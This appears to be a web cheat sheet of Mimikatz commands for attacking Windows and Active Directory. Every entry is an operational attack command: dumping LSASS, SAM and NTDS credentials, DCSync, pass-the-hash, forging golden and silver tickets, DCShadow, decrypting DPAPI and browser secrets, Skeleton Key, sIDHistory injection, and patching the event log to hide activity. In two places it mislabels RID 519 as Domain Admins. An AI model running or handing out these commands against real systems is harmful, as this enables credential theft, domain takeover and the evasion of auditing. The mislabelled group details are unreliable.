active-directory

Mimikatz — Windows Credential Dumping

Mimikatz extracts plaintext passwords, hashes, PIN codes, and Kerberos tickets from Windows memory.

Jul 2026 lazyhackers
Core Commands (12)
privilege::debug
Enable SeDebugPrivilege on the current token (needed to open LSASS; run first, from an elevated admin prompt)
priv debug
token::elevate
Impersonate a SYSTEM token (after privilege::debug); needed for lsadump::sam, lsadump::secrets and lsadump::cache against the live registry
priv system
sekurlsa::logonpasswords
Dump every logon session's credential material from LSASS: NTLM/SHA1, Kerberos keys, and plaintext where an SSP still caches it (WDigest, tspkg, ssp)
lsass creds plaintext
sekurlsa::wdigest
Dump WDigest plaintext passwords; empty on Windows 8.1/2012 R2 and later unless UseLogonCredential=1 is set under HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest
wdigest creds
sekurlsa::pth /user:admin /domain:corp /ntlm:HASH /run:cmd.exe
Pass-the-Hash: spawn cmd.exe whose network logons use this NT hash (the local token is unchanged); /aes256: instead of /ntlm: gives overpass-the-hash with an AES key
pth pass-the-hash
sekurlsa::tickets
List Kerberos tickets in memory
kerberos tickets
sekurlsa::tickets /export
Export all Kerberos tickets to .kirbi files
kerberos tickets export
sekurlsa::ekeys
Dump the Kerberos keys of every logon session (aes256, aes128, rc4_hmac; rc4_hmac_nt equals the NT hash)
kerberos aes
sekurlsa::dpapi
Dump the DPAPI masterkeys cached in LSASS (GUID + key), which dpapi::cred and the other dpapi:: modules can then use
dpapi creds
sekurlsa::msv
Dump NTLM/SHA1 hashes from LSASS (msv1_0 provider)
sekurlsa ntlm
sekurlsa::credman
Dump Credential Manager secrets from LSASS
sekurlsa credman
sekurlsa::ssp
Dump cleartext creds cached by SSP providers
sekurlsa ssp
SAM & NTDS (10)
lsadump::sam
Dump local SAM hashes; needs token::elevate on a live system, or /system:SYSTEM /sam:SAM against exported hives offline
sam hashes
lsadump::lsa /patch
Dump NT hashes from the local LSA by patching samsrv in LSASS (on a DC this yields every domain account without any DRS traffic); /inject is the alternative to /patch
lsa secrets
lsadump::dcsync /domain:corp.local /user:Administrator
DCSync: pull one account's NTLM and Kerberos keys via DRS replication (needs Replicating Directory Changes All: DA, EA or a DC machine account)
dcsync da
lsadump::dcsync /domain:corp.local /all /csv
DCSync: dump every account as tab-separated RID, sAMAccountName, NTLM, userAccountControl
dcsync all
lsadump::cache
Dump cached domain logons (DCC2/MSCache2); not usable for pass-the-hash, must be cracked (hashcat -m 2100)
cache creds
lsadump::secrets
Dump LSA secrets: service account passwords, auto-logon, $MACHINE.ACC and DPAPI_SYSTEM
lsa secrets
lsadump::dcsync /domain:corp.local /user:krbtgt
Targeted DCSync of krbtgt (golden-ticket material)
dcsync krbtgt
lsadump::trust /patch
Dump inter-realm trust keys (forge inter-realm trust tickets with kerberos::golden /service:krbtgt /target:<other domain FQDN> /rc4:<trust key>)
trust kerberos
lsadump::backupkeys /system:dc01.corp.local /export
Export the domain DPAPI backup key (.pvk): decrypts any domain user's masterkey offline with dpapi::masterkey /pvk:
dpapi backupkey
lsadump::dcshadow /object:victim /attribute:sidHistory /value:S-1-5-21-XXXX-519
DCShadow: register this host as a rogue DC and replicate an attribute change (here Domain Admins in sIDHistory); run as SYSTEM, then push it with lsadump::dcshadow /push from a second Mimikatz running as Domain Admin
dcshadow persistence
Kerberos Ticket Attacks (5)
kerberos::list /export
List and export Kerberos tickets
kerberos tickets
kerberos::ptt ticket.kirbi
Pass-the-Ticket — inject .kirbi into session
ptt kerberos
kerberos::golden /user:Administrator /domain:corp.local /sid:S-1-5-21-xxx /krbtgt:HASH /ticket:golden.kirbi
Create a Golden Ticket offline from the krbtgt hash (or /aes256:); add /ptt to inject it instead of writing the file. Since the Nov 2021 PAC hardening (KB5008380) the /user must exist and /id must be its real RID (default 500)
golden-ticket kerberos
kerberos::silver /user:Administrator /domain:corp.local /sid:S-1-5-21-xxx /target:server /service:cifs /rc4:HASH /ticket:silver.kirbi
Create a Silver Ticket for one service: /target is the host FQDN, /rc4 is the NT hash of the account that runs the service (the machine account for cifs/host); never contacts the DC
silver-ticket kerberos
kerberos::purge
Delete all Kerberos tickets from memory
kerberos cleanup
Remote & Evasion (4)
invoke-mimikatz -DumpCreds
PowerSploit Invoke-Mimikatz: reflectively loads Mimikatz into PowerShell memory (nothing written to disk, but the script is heavily signatured by AMSI and EDR)
powershell invoke evasion
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit" > creds.txt
Run Mimikatz non-interactively
cli noninteractive
procdump.exe -ma lsass.exe lsass.dmp
Dump LSASS with Sysinternals ProcDump (signed binary; -ma = full dump, add -accepteula), then parse the dump offline
lsass dump procdump
mimikatz "sekurlsa::minidump lsass.dmp" "sekurlsa::logonpasswords" "exit"
Parse an offline LSASS dump; use a Mimikatz build matching the dump's architecture, ideally on the same Windows version the dump came from
lsass minidump offline
DPAPI & Vault (6)
dpapi::masterkey /in:"%appdata%\Microsoft\Protect\SID\mkfile" /sid:S-1-5-21-XXXX /password:Passw0rd
Decrypt a user DPAPI masterkey with their password
dpapi masterkey
dpapi::masterkey /in:mkfile /rpc
Decrypt a domain user's masterkey by asking the DC over the BackupKey RPC (MS-BKRP); works for masterkeys that belong to the current user context
dpapi rpc
dpapi::cred /in:credfile
Decrypt a DPAPI credential blob (its masterkey must already be in the cache, see dpapi::cache)
dpapi credentials
dpapi::chrome /in:"%localappdata%\Google\Chrome\User Data\Default\Login Data"
Decrypt Chrome saved logins via DPAPI; from Chrome 80 on, add /unprotect so Mimikatz also unwraps the AES key Chrome keeps in Local State
dpapi chrome browser
vault::cred /patch
Dump stored Windows Vault credentials
vault
vault::list
List Windows Vault entries
vault
Persistence & Advanced (5)
misc::skeleton
Install the Skeleton Key patch in LSASS on a DC (privilege::debug first): the master password "mimikatz" then authenticates as any account alongside the real password; Kerberos is downgraded to RC4 and the patch is gone at reboot
skeleton persistence
lsadump::setntlm /user:victim /server:dc01.corp.local /ntlm:NEWHASH
Remotely set a user's NT hash over SAMR (needs Reset Password rights on the target); lsadump::changentlm does the same with the current password or hash and no extra rights
setntlm
mimikatz.exe "crypto::capi" "crypto::cng" "crypto::certificates /export /systemstore:LOCAL_MACHINE" "exit"
Patch CAPI (crypto::capi) and CNG/KeyIso (crypto::cng, needs privilege::debug) so non-exportable keys export, then dump machine certs with private keys to .pfx (password mimikatz), including the CA key when run on an ADCS CA
crypto certificates
misc::addsid victim S-1-5-21-XXXX-519
Add a SID to an account's sIDHistory (here Domain Admins, RID 519) by patching NTDS on the DC; run as Domain Admin on a DC
sidhistory persistence
event::drop
Patch the Event Log service in memory so it stops writing events (needs privilege::debug; lasts until the service restarts); event::clear wipes the Security log instead
evasion eventlog